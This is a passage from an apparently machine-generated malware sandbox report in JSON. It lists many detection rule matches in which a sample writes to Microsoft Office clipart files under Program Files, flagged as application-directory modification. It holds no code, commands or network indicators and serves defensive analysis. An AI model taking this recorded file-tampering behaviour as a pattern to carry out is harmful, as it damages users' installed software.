"ref_id": "gfn_39770", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387591.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387604.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387604.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39781", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387604.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387882.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387882.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39792", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387882.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387895.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387895.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39803", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387895.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0390072.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0390072.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39812", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0390072.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400001.PNG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400001.png", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39819", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400001.png\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400002.PNG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400002.png", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39850", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400002.png\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400003.PNG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400003.png", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39867", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400003.png\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400004.PNG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400004.png", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39888", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400004.png\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400005.PNG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400005.png", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39907", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400005.png\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JAVA_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39924", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\java_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\JNGLE_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39931", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\jngle_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00021_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\mp00021_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39938", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\mp00021_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00132_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\mp00132_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39945", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\mp00132_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MP00646_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\mp00646_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39952", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\mp00646_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\MUSIC_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39959", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\music_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00042_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00042_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39966", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00042_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00057_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00057_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39975", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00057_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00058_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00058_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39982", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00058_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00068_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00068_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39989", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00068_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00238_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00238_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39996", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00238_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00330_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00330_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40003", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00330_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00388_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00388_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40010", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00388_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00389_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00389_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40017", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00389_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00390_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00390_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40024", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00390_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00391_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00391_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40031", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00391_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00394_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00394_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40038", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00394_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00395_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00395_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40045", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00395_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00396_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00396_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40052", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00396_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00417_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00417_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40059", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00417_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00433_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00433_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40066", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00433_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00438_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00438_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40075", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00438_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00452_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00452_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_40082", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\na00452_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00454_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft 